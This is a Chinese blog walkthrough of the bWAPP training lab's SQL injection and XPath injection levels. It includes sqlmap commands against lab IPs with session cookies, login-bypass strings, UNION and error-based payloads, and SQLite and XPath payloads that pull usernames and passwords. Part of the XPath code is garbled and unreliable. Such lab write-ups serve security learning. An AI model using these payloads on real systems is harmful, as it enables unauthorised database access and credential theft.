大家好,又见面了,我是你们的朋友全栈君。
文章目录
- SQL Injection (GET/Search)
- SQL Injection (GET/Select)
- SQL Injection (POST/Search)
- SQL Injection (POST/Select)
- SQL Injection (AJAX/JSON/jQuery)
- SQL Injection (CAPTCHA)
- SQL Injection (Login Form/Hero)
- SQL Injection (Login Form/User)
- SQL Injection (SQLite)
- SQL Injection – Stored (Blog)
- SQL Injection – Stored (SQLite)
- SQL Injection – Stored (User-Agent)
- SQL Injection – Stored (XML)
- XML/XPath Injection (Login Form)
- XML/XPath Injection (Search)
SQL Injection (GET/Search)
这里的题都可以用sqlmap解决 sqlmap详解,可以参考这篇文章
构造sqlmap -u "http://192.168.41.137/sqli_1.php?title=a&action=search" -p title --cookie "security_level=0; PHPSESSID=bsmemp4vk1015lbju2csqchr63"
这里需要加cooike值,靶场需要登录
然后就会自动构造
SQL Injection (GET/Select)
使用order by 尝试可知,能试到7, 使用联合查询试一下,可以,然后就开始查库,查表,查列
SQL Injection (POST/Search)
使用了post传参而已 解决方法和get一样
SQL Injection (POST/Select)
通过抓包可以知道,不仅是post传参,而且title改成了movie,
解决方法一样
SQL Injection (AJAX/JSON/jQuery)
首先解释一下AJAX,Ajax 即“Asynchronous Javascript And XML”(异步 JavaScript 和 XML),通过在后台与服务器进行少量数据交换,Ajax 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行更新。比如我们使用百度的时候,有个功能叫“搜索预测”,当你输入第一个字的时候,下拉框里就会出现大量可能的关键词候选,这个用的就是ajax技术,而它的返回值一般是json/xml格式的,jQuery中提供实现ajax的方法(因为js很容易捕捉客户端的按键行为)
抓包推断输入的a是get传参方法,但
URL为sqli_10-2.php?title=a但是实际浏览器看到的页面是,sqli_10-1.php,观察源代码发现
sqli_10-1.php将参数通过getJSON方法传给sqli_10-2.php,sqli_10-2.php立马执行查询,所以真正的注入点在sqli_10-2.php的title参数 当然,sqlmap能解决
SQL Injection (CAPTCHA)
进入后,直接输点东西,观看url,即可知道点在哪里
SQL Injection (Login Form/Hero)
用sql语句构造绕过,
admin
aa ' or 'a' = 'a
这是我采用的一种写法
用sqlmap的话,
这样构造
sqlmap -u "http://192.168.248.130/bWAPP/sqli_3.php" --data "login=111&password=111&form=submit" --cookie "security_level=0; PHPSESSID=5913f596beeaf73e40495ff8037750a9" -p login
用给定的payload进行post注入
SQL Injection (Login Form/User)
order by 先爆破
当为9的时候
当为10的时候,
因此我们就可以相信他是9
' UNION SELECT 1,2,3,4,5,6,7,8,9#在使用联合查询爆破回显位
但尝试后感觉不行,最后搜索到的大佬是这样写的
' UNION SELECT 1,2,'356a192b7913b04c54574d18c28d46e6395428ab',4,5,6,7,8,9#
原因http://www.mamicode.com/info-detail-2239051.html
SQL Injection (SQLite)
SQLite 简介
SQLite是一个软件库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。SQLite是一个增长最快的数据库引擎,这是在普及方面的增长,与它的尺寸大小无关。SQLite 源代码不受版权限制。
sqlmap可以解决
SQL Injection – Stored (Blog)
用sqlmap将post参数加上去
SQL Injection – Stored (SQLite)
meetsec’,’’); meetsec’,sqlite_version()); meetsec’,(select name from sqlite_master where type=‘table’)); meetsec’,(select login||”:”||password from users)) – – 新的独立的注入方法
SQL Injection – Stored (User-Agent)
抓包,修改UA为单引号,出现报错
继续
1' ,(select version()))#
1' ,(select user()))#,这样都可以查询到
SQL Injection – Stored (XML)
构造post参数
<reset><login>bee' (select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) '</login><secret>bee' (select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) '</secret></reset>
XML/XPath Injection (Login Form)
XPath其实和sql查询挺像,区别在于sql查询是在数据库中查数据,Xpath是在xml中找信息,既然如此只要熟悉一下Xpath的语法,知道它的特点即可找到对应的注入思路
在 XPath 中,有七种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档节点(或称为根节点)。节点之间存在父、子、先辈、后代、同胞关系,以t3stt3st.xml为例
根节点<root1> 、元素节点<user><username><key><hctfadmin>、属性节点name='user1'
<root1>是<user>和<htcfadmin>的父节点,同时也是<user><hctfadmin><username><key>的先辈。和是同胞节点。
构造meetset' or '1'='1,成功
XML/XPath Injection (Search)
$xml = simplexml_load_file(“passwords/heroes.xml”);
// XPath search // result = x m l − > x p a t h ( ” / / h e r o [ g e n r e = ′ xml->xpath(“//hero[genre = ‘ xml−>xpath(“//hero[genre=′genre’]/movie”);
那么我们补全我们需要但他所缺乏的 构造payload')]/password | a[contains(a,' 这样完整的语句就是 result = xml->xpath("//hero[contains(genre, '')]/password | a[contains(a,'')]/movie"); 即 result = xml->xpath("//hero/password");
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/190423.html原文链接:https://javaforall.cn
